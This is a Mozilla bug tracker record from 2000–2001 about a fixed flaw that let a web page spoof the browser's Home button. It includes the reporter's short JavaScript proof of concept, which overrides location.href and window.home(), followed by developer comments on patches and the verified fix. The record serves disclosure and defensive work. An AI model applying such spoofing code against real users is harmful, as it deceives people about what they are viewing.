spoofing user's "Home"

VERIFIED FIXED in mozilla0.9.1

Status

()

P2
normal
VERIFIED FIXED
19 years ago
17 years ago

People

(Reporter: security-bugs, Assigned: security-bugs)

Tracking

Trunk
mozilla0.9.1
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [need reviews])

Attachments

(1 attachment)

Date: 
          Mon, 26 Jun 2000 16:48:03 +0300
   From: 
          Georgi Guninski <joro@nat.bg>
      To: 
          Mitchell Stoltz <mstoltz@netscape.com>




It is possible to change the behavior of clicking the "Home" button or
choosing "Go|Home" from the menu.
The exploit uses __defineGetter__ and redefinion of window.home().
I think that allowing redefinition of predefined functions is not a good
idea.

The code is:
---------------------------------------
Press the "Home" button or choose "Go|Home" in the other window in 2
seconds.
<SCRIPT>
a=window.open("about:blank","a");
function f()
{
a.location.__defineGetter__("href",function() {return
"http://www.yahoo.com"});
a.window.home=new Function("this.document.body.innerHTML='Spoofed'");
a.window.home();
}
setTimeout("f()",2000);
</SCRIPT>
---------------------------------------
(Assignee)

Comment 1

19 years ago
This testcase does not behave as described, but the vulnerabilities mentioned
should be addressed.
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
(Assignee)

Comment 2

19 years ago
Can't duplicate this exploit, marking M18 for post-Beta2. Re-address this exploit 
and look at the issue of redefining properties.
Target Milestone: --- → M18
(Assignee)

Comment 3

18 years ago
Fixing 36946 by marking key properties as PERMANENT will fix this too. As for 
__defineGetter__, this should be fixed now, i think.
Depends on: 36946
(Assignee)

Comment 4

18 years ago
I think this no longer works, marking nsbeta3 to remind myself to look at it.
Keywords: nsbeta3
Priority: P3 → P2
(Assignee)

Comment 5

18 years ago
Nominating for RTM, and I have opened bug 54976 on the __defineGetter__ aspect
of this bug. Patrick, can you give me a + ?
Keywords: rtm
(Assignee)

Comment 6

18 years ago
Created attachment 17287 [details] [diff] [review]
jst's patch - makes location permanent
(Assignee)

Comment 7

18 years ago
I've posted jst's patch which adds JSPROP_PERMANENT to the location property.
This dosn't completely fix the problem. Looks like we have to protect
location.href as well. 

Comment 8

18 years ago
Mitch, are you happy with the patch in this bug?  Can it go to reviews?  (Is it
OK to strcmp against "LOCATION" vs "location" or using strcasecmp?)  The fix is
reasonably small.  If you think it's correct, it _might_ get approved for RTM...
Whiteboard: [need reviews]
(Assignee)

Comment 9

18 years ago
This patch is not a complete fix. We need to restrict "location.href" as well.
I'll see about getting this done.

Updated

18 years ago
QA Contact: czhang → junruh
(Assignee)

Comment 10

18 years ago
Future, since the fix is not ready yet.
Target Milestone: M18 → Future
(Assignee)

Updated

18 years ago
Keywords: rtm
(Assignee)

Comment 11

18 years ago
removing rtm.

Comment 12

18 years ago
Mass changing QA to ckritzer.
QA Contact: junruh → ckritzer
(Assignee)

Comment 13

18 years ago
Mass changing milestones to Moz0.9.1. Many of these bugs are dependent on the
XPConnected DOM and its associated security UI changes.
Target Milestone: Future → mozilla0.9.1
(Assignee)

Comment 14

18 years ago
Georgi thinks this is no longer an issue. You can still redefine window.home()
but this doesn't change the behavior of the Home button anymore. There are a few
other bugs dealing with redefining built-in proerties, but that's covered
elsewhere, so I'm closing this one.
Status: ASSIGNED → RESOLVED
Last Resolved: 18 years ago
Resolution: --- → FIXED

Comment 15

18 years ago
Marking VERIFIED FIXED per originator on:
-MacOS91 2001-05-21-15-trunk
-Win98SE 2001-05-22-06-trunk
-LinRH62 2001-05-22-05-trunk
Status: RESOLVED → VERIFIED
(Assignee)

Comment 16

17 years ago
Removing NS_Confidential flag.
Group: netscapeconfidential?
You need to log in before you can comment on or make changes to this bug.